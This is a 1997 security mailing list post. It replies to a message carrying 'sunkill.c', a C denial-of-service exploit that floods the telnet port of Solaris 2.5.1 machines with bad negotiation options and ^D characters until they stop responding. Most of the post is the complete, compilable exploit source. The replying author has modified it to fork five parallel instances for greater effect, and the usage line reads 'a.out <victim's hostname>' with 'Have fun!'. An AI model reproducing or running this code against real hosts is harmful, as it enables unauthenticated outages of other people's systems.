best-of-security-request@cyber.com.au with unsubscribe
X-RDate: Tue, 23 Dec 1997 12:40:46 +0500 (ESK)
Date: Sun, 14 Dec 1997 14:27:27 -0600
From: Craig Johnston <caj@PRALINE.NO.NEOSOFT.COM>
To: best-of-security@cyber.com.au
Subject: BoS: Re: To kill a sun:
On Sat, 13 Dec 1997, Jason Zapman II wrote:
> This is sunkill.c
>
> It Affects at least solaris 2.5.1 machines, both sun4c and sun4m
> achitecutures. I imagine it affects all solaris 2.5.1 machines, both sparc
> and x86, but im not sure. It basically works by opening a telnet
> connection on the victim machine and sends a few bad telnet negotiation
> options, then flooods the port with lots of ^D characters. This uses all
> the streams memory (i think) on the victims machine and causes the kernel
> to get very angry. The machien crawls to a halt, the cursor in X stops
> moving, the machine is unresponsive to the network. Its a bad situation
> all around.
BTW, Sun is aware of this, but has neglected to do anything about it.
CERT has been made aware as well. Both quite some time ago. I guess
a no-login-needed, denial of service attack on any open telnet port
isn't very meaningful.
The telnet options are pretty standard, actually.
This code has killed all the way up to ultras running 2.5.1.
I've added a line that seems to make this do a lot better -- it
just runs 5 instances in parallel. I've also tidied up a couple of
little things, they are the now-unquoted lines.
The affected machine will ping but good luck getting a login
prompt or doing anything much else on it.
Some machines seem to shrug it off, while on others it is
devestating. With persistence, it seems to take out most of 'em sooner
or later.
The machine doesn't actually crash, it goes into deep hibernation. Leave
it alone and it'll come back.
>
> /*
> ** To make, if your system is BSD'ish: gcc <thisfile>
> ** ...if your system is SysV'ish: gcc -lnsl -lsocket <thisfile>
> **
> ** Usage: a.out <victim's hostname>
> **
> ** Have fun!
> */
>
> #include <signal.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <netdb.h>
> #include <arpa/telnet.h>
> #include <string.h>
> #include <unistd.h>
>
> #define BUFSIZE 100
> #define DOTS
>
> void catchit(void)
> {
> printf("\nCaught SIGPIPE -- your link may be too slow.\n");
> exit(1);
> }
>
> int main(int argc, char *argv[])
> {
> unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO, \
> TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
> TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};
>
> unsigned char nastybuf[BUFSIZE];
> struct sockaddr_in sin;
> struct servent *sp;
> struct hostent *hp;
> int s;
>
int child;
for(child=4;child && fork();--child); /* and then there were 5 */
> typedef void (*sig_t) (int);
> signal(SIGPIPE,(sig_t)catchit);
>
> memset(nastybuf,4,BUFSIZE); /* ascii 4 = ^D */
>
if ((s = socket(AF_INET, SOCK_STREAM, 0))==-1) {
perror("socket");
> exit(1);
> }
>
> if (!(hp = gethostbyname(argv[1]))) {
herror("gethostbyname");
> exit(1);
> }
>
> bzero(&sin,sizeof(sin));
> bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
> sin.sin_family = AF_INET;
> sp = getservbyname("telnet","tcp");
> sin.sin_port = sp->s_port;
>
> if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
perror("connect");
> exit(1);
> }
>
> printf("connected to %s\n",argv[1]);
> write(s,kludge_telopt,21); /* kludge some telnet negotiation */
>
> /* "Let them eat ^Ds..." */
>
> while (write(s,nastybuf,BUFSIZE) != -1) {
>
> #ifdef DOTS
> write(STDOUT_FILENO,".",1);
> #endif
> }
> }
>
--
Craig A. Johnston / Applications Engineer, NeoSoft, Inc.
caj@neosoft.com / ph: (504) 539-9235
